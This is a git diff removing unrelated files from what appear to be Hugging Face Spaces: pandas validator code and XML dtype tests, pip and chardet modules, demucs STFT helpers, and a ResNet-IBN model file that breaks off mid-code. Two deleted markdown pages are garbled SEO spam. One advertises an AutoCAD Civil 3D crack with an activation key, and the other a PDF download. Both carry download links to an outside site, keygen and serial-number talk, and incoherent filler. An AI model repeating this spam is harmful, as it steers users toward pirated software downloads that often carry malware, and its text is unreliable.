-> None: - if not args and not kwargs: - return None - - fname = self.fname if fname is None else fname - max_fname_arg_count = ( - self.max_fname_arg_count - if max_fname_arg_count is None - else max_fname_arg_count - ) - method = self.method if method is None else method - - if method == "args": - validate_args(fname, args, max_fname_arg_count, self.defaults) - elif method == "kwargs": - validate_kwargs(fname, kwargs, self.defaults) - elif method == "both": - validate_args_and_kwargs( - fname, args, kwargs, max_fname_arg_count, self.defaults - ) - else: - raise ValueError(f"invalid validation method '{method}'") - - -ARGMINMAX_DEFAULTS = {"out": None} -validate_argmin = CompatValidator( - ARGMINMAX_DEFAULTS, fname="argmin", method="both", max_fname_arg_count=1 -) -validate_argmax = CompatValidator( - ARGMINMAX_DEFAULTS, fname="argmax", method="both", max_fname_arg_count=1 -) - - -def process_skipna(skipna: bool | ndarray | None, args) -> tuple[bool, Any]: - if isinstance(skipna, ndarray) or skipna is None: - args = (skipna,) + args - skipna = True - - return skipna, args - - -def validate_argmin_with_skipna(skipna: bool | ndarray | None, args, kwargs) -> bool: - """ - If 'Series.argmin' is called via the 'numpy' library, the third parameter - in its signature is 'out', which takes either an ndarray or 'None', so - check if the 'skipna' parameter is either an instance of ndarray or is - None, since 'skipna' itself should be a boolean - """ - skipna, args = process_skipna(skipna, args) - validate_argmin(args, kwargs) - return skipna - - -def validate_argmax_with_skipna(skipna: bool | ndarray | None, args, kwargs) -> bool: - """ - If 'Series.argmax' is called via the 'numpy' library, the third parameter - in its signature is 'out', which takes either an ndarray or 'None', so - check if the 'skipna' parameter is either an instance of ndarray or is - None, since 'skipna' itself should be a boolean - """ - skipna, args = process_skipna(skipna, args) - validate_argmax(args, kwargs) - return skipna - - -ARGSORT_DEFAULTS: dict[str, int | str | None] = {} -ARGSORT_DEFAULTS["axis"] = -1 -ARGSORT_DEFAULTS["kind"] = "quicksort" -ARGSORT_DEFAULTS["order"] = None -ARGSORT_DEFAULTS["kind"] = None - - -validate_argsort = CompatValidator( - ARGSORT_DEFAULTS, fname="argsort", max_fname_arg_count=0, method="both" -) - -# two different signatures of argsort, this second validation for when the -# `kind` param is supported -ARGSORT_DEFAULTS_KIND: dict[str, int | None] = {} -ARGSORT_DEFAULTS_KIND["axis"] = -1 -ARGSORT_DEFAULTS_KIND["order"] = None -validate_argsort_kind = CompatValidator( - ARGSORT_DEFAULTS_KIND, fname="argsort", max_fname_arg_count=0, method="both" -) - - -def validate_argsort_with_ascending(ascending: bool | int | None, args, kwargs) -> bool: - """ - If 'Categorical.argsort' is called via the 'numpy' library, the first - parameter in its signature is 'axis', which takes either an integer or - 'None', so check if the 'ascending' parameter has either integer type or is - None, since 'ascending' itself should be a boolean - """ - if is_integer(ascending) or ascending is None: - args = (ascending,) + args - ascending = True - - validate_argsort_kind(args, kwargs, max_fname_arg_count=3) - ascending = cast(bool, ascending) - return ascending - - -CLIP_DEFAULTS: dict[str, Any] = {"out": None} -validate_clip = CompatValidator( - CLIP_DEFAULTS, fname="clip", method="both", max_fname_arg_count=3 -) - - -@overload -def validate_clip_with_axis(axis: ndarray, args, kwargs) -> None: - ... - - -@overload -def validate_clip_with_axis(axis: AxisNoneT, args, kwargs) -> AxisNoneT: - ... - - -def validate_clip_with_axis( - axis: ndarray | AxisNoneT, args, kwargs -) -> AxisNoneT | None: - """ - If 'NDFrame.clip' is called via the numpy library, the third parameter in - its signature is 'out', which can takes an ndarray, so check if the 'axis' - parameter is an instance of ndarray, since 'axis' itself should either be - an integer or None - """ - if isinstance(axis, ndarray): - args = (axis,) + args - # error: Incompatible types in assignment (expression has type "None", - # variable has type "Union[ndarray[Any, Any], str, int]") - axis = None # type: ignore[assignment] - - validate_clip(args, kwargs) - # error: Incompatible return value type (got "Union[ndarray[Any, Any], - # str, int]", expected "Union[str, int, None]") - return axis # type: ignore[return-value] - - -CUM_FUNC_DEFAULTS: dict[str, Any] = {} -CUM_FUNC_DEFAULTS["dtype"] = None -CUM_FUNC_DEFAULTS["out"] = None -validate_cum_func = CompatValidator( - CUM_FUNC_DEFAULTS, method="both", max_fname_arg_count=1 -) -validate_cumsum = CompatValidator( - CUM_FUNC_DEFAULTS, fname="cumsum", method="both", max_fname_arg_count=1 -) - - -def validate_cum_func_with_skipna(skipna: bool, args, kwargs, name) -> bool: - """ - If this function is called via the 'numpy' library, the third parameter in - its signature is 'dtype', which takes either a 'numpy' dtype or 'None', so - check if the 'skipna' parameter is a boolean or not - """ - if not is_bool(skipna): - args = (skipna,) + args - skipna = True - elif isinstance(skipna, np.bool_): - skipna = bool(skipna) - - validate_cum_func(args, kwargs, fname=name) - return skipna - - -ALLANY_DEFAULTS: dict[str, bool | None] = {} -ALLANY_DEFAULTS["dtype"] = None -ALLANY_DEFAULTS["out"] = None -ALLANY_DEFAULTS["keepdims"] = False -ALLANY_DEFAULTS["axis"] = None -validate_all = CompatValidator( - ALLANY_DEFAULTS, fname="all", method="both", max_fname_arg_count=1 -) -validate_any = CompatValidator( - ALLANY_DEFAULTS, fname="any", method="both", max_fname_arg_count=1 -) - -LOGICAL_FUNC_DEFAULTS = {"out": None, "keepdims": False} -validate_logical_func = CompatValidator(LOGICAL_FUNC_DEFAULTS, method="kwargs") - -MINMAX_DEFAULTS = {"axis": None, "dtype": None, "out": None, "keepdims": False} -validate_min = CompatValidator( - MINMAX_DEFAULTS, fname="min", method="both", max_fname_arg_count=1 -) -validate_max = CompatValidator( - MINMAX_DEFAULTS, fname="max", method="both", max_fname_arg_count=1 -) - -RESHAPE_DEFAULTS: dict[str, str] = {"order": "C"} -validate_reshape = CompatValidator( - RESHAPE_DEFAULTS, fname="reshape", method="both", max_fname_arg_count=1 -) - -REPEAT_DEFAULTS: dict[str, Any] = {"axis": None} -validate_repeat = CompatValidator( - REPEAT_DEFAULTS, fname="repeat", method="both", max_fname_arg_count=1 -) - -ROUND_DEFAULTS: dict[str, Any] = {"out": None} -validate_round = CompatValidator( - ROUND_DEFAULTS, fname="round", method="both", max_fname_arg_count=1 -) - -SORT_DEFAULTS: dict[str, int | str | None] = {} -SORT_DEFAULTS["axis"] = -1 -SORT_DEFAULTS["kind"] = "quicksort" -SORT_DEFAULTS["order"] = None -validate_sort = CompatValidator(SORT_DEFAULTS, fname="sort", method="kwargs") - -STAT_FUNC_DEFAULTS: dict[str, Any | None] = {} -STAT_FUNC_DEFAULTS["dtype"] = None -STAT_FUNC_DEFAULTS["out"] = None - -SUM_DEFAULTS = STAT_FUNC_DEFAULTS.copy() -SUM_DEFAULTS["axis"] = None -SUM_DEFAULTS["keepdims"] = False -SUM_DEFAULTS["initial"] = None - -PROD_DEFAULTS = SUM_DEFAULTS.copy() - -MEAN_DEFAULTS = SUM_DEFAULTS.copy() - -MEDIAN_DEFAULTS = STAT_FUNC_DEFAULTS.copy() -MEDIAN_DEFAULTS["overwrite_input"] = False -MEDIAN_DEFAULTS["keepdims"] = False - -STAT_FUNC_DEFAULTS["keepdims"] = False - -validate_stat_func = CompatValidator(STAT_FUNC_DEFAULTS, method="kwargs") -validate_sum = CompatValidator( - SUM_DEFAULTS, fname="sum", method="both", max_fname_arg_count=1 -) -validate_prod = CompatValidator( - PROD_DEFAULTS, fname="prod", method="both", max_fname_arg_count=1 -) -validate_mean = CompatValidator( - MEAN_DEFAULTS, fname="mean", method="both", max_fname_arg_count=1 -) -validate_median = CompatValidator( - MEDIAN_DEFAULTS, fname="median", method="both", max_fname_arg_count=1 -) - -STAT_DDOF_FUNC_DEFAULTS: dict[str, bool | None] = {} -STAT_DDOF_FUNC_DEFAULTS["dtype"] = None -STAT_DDOF_FUNC_DEFAULTS["out"] = None -STAT_DDOF_FUNC_DEFAULTS["keepdims"] = False -validate_stat_ddof_func = CompatValidator(STAT_DDOF_FUNC_DEFAULTS, method="kwargs") - -TAKE_DEFAULTS: dict[str, str | None] = {} -TAKE_DEFAULTS["out"] = None -TAKE_DEFAULTS["mode"] = "raise" -validate_take = CompatValidator(TAKE_DEFAULTS, fname="take", method="kwargs") - - -def validate_take_with_convert(convert: ndarray | bool | None, args, kwargs) -> bool: - """ - If this function is called via the 'numpy' library, the third parameter in - its signature is 'axis', which takes either an ndarray or 'None', so check - if the 'convert' parameter is either an instance of ndarray or is None - """ - if isinstance(convert, ndarray) or convert is None: - args = (convert,) + args - convert = True - - validate_take(args, kwargs, max_fname_arg_count=3, method="both") - return convert - - -TRANSPOSE_DEFAULTS = {"axes": None} -validate_transpose = CompatValidator( - TRANSPOSE_DEFAULTS, fname="transpose", method="both", max_fname_arg_count=0 -) - - -def validate_groupby_func(name: str, args, kwargs, allowed=None) -> None: - """ - 'args' and 'kwargs' should be empty, except for allowed kwargs because all - of their necessary parameters are explicitly listed in the function - signature - """ - if allowed is None: - allowed = [] - - kwargs = set(kwargs) - set(allowed) - - if len(args) + len(kwargs) > 0: - raise UnsupportedFunctionCall( - "numpy operations are not valid with groupby. " - f"Use .groupby(...).{name}() instead" - ) - - -RESAMPLER_NUMPY_OPS = ("min", "max", "sum", "prod", "mean", "std", "var") - - -def validate_resampler_func(method: str, args, kwargs) -> None: - """ - 'args' and 'kwargs' should be empty because all of their necessary - parameters are explicitly listed in the function signature - """ - if len(args) + len(kwargs) > 0: - if method in RESAMPLER_NUMPY_OPS: - raise UnsupportedFunctionCall( - "numpy operations are not valid with resample. " - f"Use .resample(...).{method}() instead" - ) - raise TypeError("too many arguments passed in") - - -def validate_minmax_axis(axis: AxisInt | None, ndim: int = 1) -> None: - """ - Ensure that the axis argument passed to min, max, argmin, or argmax is zero - or None, as otherwise it will be incorrectly ignored. - - Parameters - ---------- - axis : int or None - ndim : int, default 1 - - Raises - ------ - ValueError - """ - if axis is None: - return - if axis >= ndim or (axis < 0 and ndim + axis < 0): - raise ValueError(f"`axis` must be fewer than the number of dimensions ({ndim})") - - -_validation_funcs = { - "median": validate_median, - "mean": validate_mean, - "min": validate_min, - "max": validate_max, - "sum": validate_sum, - "prod": validate_prod, -} - - -def validate_func(fname, args, kwargs) -> None: - if fname not in _validation_funcs: - return validate_stat_func(args, kwargs, fname=fname) - - validation_func = _validation_funcs[fname] - return validation_func(args, kwargs) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/io/xml/test_xml_dtypes.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/io/xml/test_xml_dtypes.py deleted file mode 100644 index fb24902efc0f52a67043762f2be51f19f5fa61cb..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/io/xml/test_xml_dtypes.py +++ /dev/null @@ -1,482 +0,0 @@ -from __future__ import annotations - -from io import StringIO - -import pytest - -from pandas.errors import ParserWarning -import pandas.util._test_decorators as td - -from pandas import ( - DataFrame, - Series, - to_datetime, -) -import pandas._testing as tm - -from pandas.io.xml import read_xml - - -@pytest.fixture(params=[pytest.param("lxml", marks=td.skip_if_no("lxml")), "etree"]) -def parser(request): - return request.param - - -@pytest.fixture( - params=[None, {"book": ["category", "title", "author", "year", "price"]}] -) -def iterparse(request): - return request.param - - -def read_xml_iterparse(data, **kwargs): - with tm.ensure_clean() as path: - with open(path, "w", encoding="utf-8") as f: - f.write(data) - return read_xml(path, **kwargs) - - -xml_types = """\ - - - - square - 00360 - 4.0 - - - circle - 00360 - - - - triangle - 00180 - 3.0 - -""" - -xml_dates = """ - - - square - 00360 - 4.0 - 2020-01-01 - - - circle - 00360 - - 2021-01-01 - - - triangle - 00180 - 3.0 - 2022-01-01 - -""" - - -# DTYPE - - -def test_dtype_single_str(parser): - df_result = read_xml(StringIO(xml_types), dtype={"degrees": "str"}, parser=parser) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - dtype={"degrees": "str"}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtypes_all_str(parser): - df_result = read_xml(StringIO(xml_dates), dtype="string", parser=parser) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - dtype="string", - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": ["4.0", None, "3.0"], - "date": ["2020-01-01", "2021-01-01", "2022-01-01"], - }, - dtype="string", - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtypes_with_names(parser): - df_result = read_xml( - StringIO(xml_dates), - names=["Col1", "Col2", "Col3", "Col4"], - dtype={"Col2": "string", "Col3": "Int64", "Col4": "datetime64[ns]"}, - parser=parser, - ) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - names=["Col1", "Col2", "Col3", "Col4"], - dtype={"Col2": "string", "Col3": "Int64", "Col4": "datetime64[ns]"}, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "Col1": ["square", "circle", "triangle"], - "Col2": Series(["00360", "00360", "00180"]).astype("string"), - "Col3": Series([4.0, float("nan"), 3.0]).astype("Int64"), - "Col4": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtype_nullable_int(parser): - df_result = read_xml(StringIO(xml_types), dtype={"sides": "Int64"}, parser=parser) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - dtype={"sides": "Int64"}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": Series([4.0, float("nan"), 3.0]).astype("Int64"), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtype_float(parser): - df_result = read_xml(StringIO(xml_types), dtype={"degrees": "float"}, parser=parser) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - dtype={"degrees": "float"}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": Series([360, 360, 180]).astype("float"), - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_wrong_dtype(xml_books, parser, iterparse): - with pytest.raises( - ValueError, match=('Unable to parse string "Everyday Italian" at position 0') - ): - read_xml( - xml_books, dtype={"title": "Int64"}, parser=parser, iterparse=iterparse - ) - - -def test_both_dtype_converters(parser): - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": [4.0, float("nan"), 3.0], - } - ) - - with tm.assert_produces_warning(ParserWarning, match="Both a converter and dtype"): - df_result = read_xml( - StringIO(xml_types), - dtype={"degrees": "str"}, - converters={"degrees": str}, - parser=parser, - ) - df_iter = read_xml_iterparse( - xml_types, - dtype={"degrees": "str"}, - converters={"degrees": str}, - parser=parser, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -# CONVERTERS - - -def test_converters_str(parser): - df_result = read_xml( - StringIO(xml_types), converters={"degrees": str}, parser=parser - ) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - converters={"degrees": str}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_converters_date(parser): - convert_to_datetime = lambda x: to_datetime(x) - df_result = read_xml( - StringIO(xml_dates), converters={"date": convert_to_datetime}, parser=parser - ) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - converters={"date": convert_to_datetime}, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_wrong_converters_type(xml_books, parser, iterparse): - with pytest.raises(TypeError, match=("Type converters must be a dict or subclass")): - read_xml( - xml_books, converters={"year", str}, parser=parser, iterparse=iterparse - ) - - -def test_callable_func_converters(xml_books, parser, iterparse): - with pytest.raises(TypeError, match=("'float' object is not callable")): - read_xml( - xml_books, converters={"year": float()}, parser=parser, iterparse=iterparse - ) - - -def test_callable_str_converters(xml_books, parser, iterparse): - with pytest.raises(TypeError, match=("'str' object is not callable")): - read_xml( - xml_books, converters={"year": "float"}, parser=parser, iterparse=iterparse - ) - - -# PARSE DATES - - -def test_parse_dates_column_name(parser): - df_result = read_xml(StringIO(xml_dates), parse_dates=["date"], parser=parser) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - parse_dates=["date"], - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_parse_dates_column_index(parser): - df_result = read_xml(StringIO(xml_dates), parse_dates=[3], parser=parser) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - parse_dates=[3], - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_parse_dates_true(parser): - df_result = read_xml(StringIO(xml_dates), parse_dates=True, parser=parser) - - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - parse_dates=True, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": ["2020-01-01", "2021-01-01", "2022-01-01"], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_parse_dates_dictionary(parser): - xml = """ - - - square - 360 - 4.0 - 2020 - 12 - 31 - - - circle - 360 - - 2021 - 12 - 31 - - - triangle - 180 - 3.0 - 2022 - 12 - 31 - -""" - - df_result = read_xml( - StringIO(xml), parse_dates={"date_end": ["year", "month", "day"]}, parser=parser - ) - df_iter = read_xml_iterparse( - xml, - parser=parser, - parse_dates={"date_end": ["year", "month", "day"]}, - iterparse={"row": ["shape", "degrees", "sides", "year", "month", "day"]}, - ) - - df_expected = DataFrame( - { - "date_end": to_datetime(["2020-12-31", "2021-12-31", "2022-12-31"]), - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_day_first_parse_dates(parser): - xml = """\ - - - - square - 00360 - 4.0 - 31/12/2020 - - - circle - 00360 - - 31/12/2021 - - - triangle - 00180 - 3.0 - 31/12/2022 - -""" - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-12-31", "2021-12-31", "2022-12-31"]), - } - ) - - with tm.assert_produces_warning( - UserWarning, match="Parsing dates in %d/%m/%Y format" - ): - df_result = read_xml(StringIO(xml), parse_dates=["date"], parser=parser) - df_iter = read_xml_iterparse( - xml, - parse_dates=["date"], - parser=parser, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_wrong_parse_dates_type(xml_books, parser, iterparse): - with pytest.raises( - TypeError, match=("Only booleans, lists, and dictionaries are accepted") - ): - read_xml(xml_books, parse_dates={"date"}, parser=parser, iterparse=iterparse) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/operations/install/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/operations/install/__init__.py deleted file mode 100644 index 24d6a5dd31fe33b03f90ed0f9ee465253686900c..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/operations/install/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -"""For modules related to installing packages. -""" diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/chardet/compat.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/chardet/compat.py deleted file mode 100644 index 8941572b3e6a2a2267659ed74e25099c37aae90b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/chardet/compat.py +++ /dev/null @@ -1,36 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# Contributor(s): -# Dan Blanchard -# Ian Cordasco -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import sys - - -if sys.version_info < (3, 0): - PY2 = True - PY3 = False - string_types = (str, unicode) - text_type = unicode - iteritems = dict.iteritems -else: - PY2 = False - PY3 = True - string_types = (bytes, str) - text_type = str - iteritems = dict.items diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Autodesk AutoCAD Civil 3D Crack With Activation Key _VERIFIED_.md b/spaces/quidiaMuxgu/Expedit-SAM/Autodesk AutoCAD Civil 3D Crack With Activation Key _VERIFIED_.md deleted file mode 100644 index 1f3a9be73a8f89d1bbace7e46461da789f3bcca3..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Autodesk AutoCAD Civil 3D Crack With Activation Key _VERIFIED_.md +++ /dev/null @@ -1,11 +0,0 @@ -

    Autodesk AutoCAD Civil 3D Crack With Activation Key


    DOWNLOAD ✔✔✔ https://geags.com/2uCqHy



    -
    -Dec 2, 2021 - This application can also optimize the data flow between ArcGIS, Autodesk Autocad Civil 3D serial number and ArcGIS. You can perform simple ... Dec 4, 2019 - Autodesk autocad civil 3d serial number. -Autodesk autocad civil 3d serial number. -Autocad civil 3d serial. -Autocad 3d civil 3d 2012 serial number Autodesk AutoCAD civil 3d serial number is the most current software which contains the professional. -Autodesk Autocad 2013 Civil 3D serial number is the most current software which contains the professional. -Autodesk autocad 2013 civil 3d serial numbers are available for download for free. 8a78ff9644
    -
    -
    -

    diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Dictionarul General Al Literaturii Romane Pdf Download !!EXCLUSIVE!!.md b/spaces/quidiaMuxgu/Expedit-SAM/Dictionarul General Al Literaturii Romane Pdf Download !!EXCLUSIVE!!.md deleted file mode 100644 index 67128b1d7967a67f513537f24eca38f785002beb..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Dictionarul General Al Literaturii Romane Pdf Download !!EXCLUSIVE!!.md +++ /dev/null @@ -1,9 +0,0 @@ - -

    favorites -
    gmail add-on for chrome download pdf
    Download NetNewsWire 3.1.1 for iPad Pro - iOS,
    Interesting Free 3d Cartoon Videos For Kids: Free 3d Cartoon Videos For Kids: Free 3d Cartoon Videos For Kids -
    top free and safe download websites
    Android Skype for Business desktop app download
    Amazons Kindle App 2.0.3.2 for PC
    Free Download Whatsapp mobile Game Download How to use.
    Favorite Games Free Download Free Download -
    premiumiceapps.com free download full version games for android
    forma de marcar un nuevo favorito Free Download Full How to make a new favorite folder.

    -

    Download Sumatra iOS 15.1 Pro cracked free no surveys | Latest
    http://www.sumatrasetia.com/m/ filefactory torrents
    Microsoft Edge Browser Home Version 15.30.1901.0 crack tool for offline no survey activation keygen free download [crack]

    -

    dictionarul general al literaturii romane pdf download


    DOWNLOAD ✫✫✫ https://geags.com/2uCs4R



    -

    In a way, this is the largest resource available in which a lot of these measurements could be made. The other advantage of ELTeC is that it is not meant to be released. This means that it cannot be downloaded by other researchers. We hope that this will allow more high-quality applications to be developed.

    -

    In conclusion, we hope that we will continue to see ELTeC grow and improve over the years. We hope to continuously add further examples of literary corpora from national and regional traditions in Europe. We would also like to make this corpus more accessible to researchers by allowing users to download non-free datasets. We would also like to increase the interoperability of ELTeC with other corpora.

    -

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/r3gm/Ultimate-Vocal-Remover-WebUI/demucs/spec.py b/spaces/r3gm/Ultimate-Vocal-Remover-WebUI/demucs/spec.py deleted file mode 100644 index 85e5dc9397df4466f4191f440bed8edf5bf01663..0000000000000000000000000000000000000000 --- a/spaces/r3gm/Ultimate-Vocal-Remover-WebUI/demucs/spec.py +++ /dev/null @@ -1,41 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. -"""Conveniance wrapper to perform STFT and iSTFT""" - -import torch as th - - -def spectro(x, n_fft=512, hop_length=None, pad=0): - *other, length = x.shape - x = x.reshape(-1, length) - z = th.stft(x, - n_fft * (1 + pad), - hop_length or n_fft // 4, - window=th.hann_window(n_fft).to(x), - win_length=n_fft, - normalized=True, - center=True, - return_complex=True, - pad_mode='reflect') - _, freqs, frame = z.shape - return z.view(*other, freqs, frame) - - -def ispectro(z, hop_length=None, length=None, pad=0): - *other, freqs, frames = z.shape - n_fft = 2 * freqs - 2 - z = z.view(-1, freqs, frames) - win_length = n_fft // (1 + pad) - x = th.istft(z, - n_fft, - hop_length, - window=th.hann_window(win_length).to(z.real), - win_length=win_length, - normalized=True, - length=length, - center=True) - _, length = x.shape - return x.view(*other, length) diff --git a/spaces/rachana219/MODT2/trackers/strongsort/deep/models/resnet_ibn_a.py b/spaces/rachana219/MODT2/trackers/strongsort/deep/models/resnet_ibn_a.py deleted file mode 100644 index d198e7c9e361c40d25bc7eb1f352b971596ee124..0000000000000000000000000000000000000000 --- a/spaces/rachana219/MODT2/trackers/strongsort/deep/models/resnet_ibn_a.py +++ /dev/null @@ -1,289 +0,0 @@ -""" -Credit to https://github.com/XingangPan/IBN-Net. -""" -from __future__ import division, absolute_import -import math -import torch -import torch.nn as nn -import torch.utils.model_zoo as model_zoo - -__all__ = ['resnet50_ibn_a'] - -model_urls = { - 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', - 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth', - 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth', -} - - -def conv3x3(in_planes, out_planes, stride=1): - "3x3 convolution with padding" - return nn.Conv2d( - in_planes, - out_planes, - kernel_size=3, - stride=stride, - padding=1, - bias=False - ) - - -class BasicBlock(nn.Module): - expansion = 1 - - def __init__(self, inplanes, planes, stride=1, downsample=None): - super(BasicBlock, self).__init__() - self.conv1 = conv3x3(inplanes, planes, stride) - self.bn1 = nn.BatchNorm2d(planes) - self.relu = nn.ReLU(inplace=True) - self.conv2 = conv3x3(planes, planes) - self.bn2 = nn.BatchNorm2d(planes) - self.downsample = downsample - self.stride = stride - - def forward(self, x): - residual = x - - out = self.conv1(x) - out = self.bn1(out) - out = self.relu(out) - - out = self.conv2(out) - out = self.bn2(out) - - if self.downsample is not None: - residual = self.downsample(x) - - out += residual - out = self.relu(out) - - return out - - -class IBN(nn.Module): - - def __init__(self, planes): - super(IBN, self).__init__() - half1 = int(planes / 2) - self.half = half1 - half2 = planes - half1 - self.IN = nn.InstanceNorm2d(half1, affine=True) - self.BN = nn.BatchNorm2d(half2) - - def forward(self, x): - split = torch.split(x, self.half, 1) - out1 = self.IN(split[0].contiguous()) - out2 = self.BN(split[1].contiguous()) - out = torch.cat((out1, out2), 1) - return out - - -class Bottleneck(nn.Module): - expansion = 4 - - def __init__(self, inplanes, planes, ibn=False, stride=1, downsample=None): - super(Bottleneck, self).__init__() - self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False) - if ibn: - self.bn1 = IBN(planes) - else: - self.bn1 = nn.BatchNorm2d(planes) - self.conv2 = nn.Conv2d( - planes, - planes, - kernel_size=3, - stride=stride, - padding=1, - bias=False - ) - self.bn2 = nn.BatchNorm2d(planes) - self.conv3 = nn.Conv2d( - planes, planes * self.expansion, kernel_size=1, bias=False - ) - self.bn3 = nn.BatchNorm2d(planes * self.expansion) - self.relu = nn.ReLU(inplace=True) - self.downsample = downsample - self.stride = stride - - def forward(self, x): - residual = x - - out = self.conv1(x) - out = self.bn1(out) - out = self.relu(out) - - out = self.conv2(out) - out = self.bn2(out) - out = self.relu(out) - - out = 